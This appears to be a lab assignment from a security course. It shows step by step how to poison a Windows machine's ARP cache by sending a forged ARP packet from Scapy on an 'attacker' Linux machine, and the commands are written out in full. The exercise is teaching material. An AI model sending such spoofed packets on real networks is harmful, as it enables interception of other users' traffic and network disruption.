On the Windows machine, open a Command Prompt window and execute the IPCONFIG command.
Make a note of your IP address for later reference.
On the Windows machine, open a Command Prompt window and execute these commands:
arp -d *
arp -a
This erases the old ARP entries from the cache.
You may completely empty the cache, as shown
below on this page, or merely reduce it to just
a few entries.
If you are using Ubuntu, use this command on the Attacker Linux machine to install it:
sudo apt-get install python-scapy
sudo scapy
a = ARP()
a.display()
The attributes of the ARP object named "a" are displayed,
as shown below on this page.
On the Linux machine, in scapy, enter these commands.
In the first command, enter the IP address of your Windows target machine.
The MAC and IP addresses in the second and third command are intentionally fake--leave them as they are.
The last MAC address is a broadcast address--leave it as it is.
a.pdst="192.168.198.139"
a.hwsrc="11:11:11:11:11:11"
a.psrc="1.1.1.1"
a.hwdst="ff:ff:ff:ff:ff:ff"
send(a)
The commands are shown in the figure
below on this page.
On the Windows machine, open a Command Prompt window and execute this command:
arp -a
The fake entry should be visible, with an "Internet Address" of
1.1.1.1 and a "Physical Address" of
11-11-11-11-11-11,
as shown below on this page.
Email the image to cnit.123@gmail.com with a Subject line of Proj X13 from Your Name.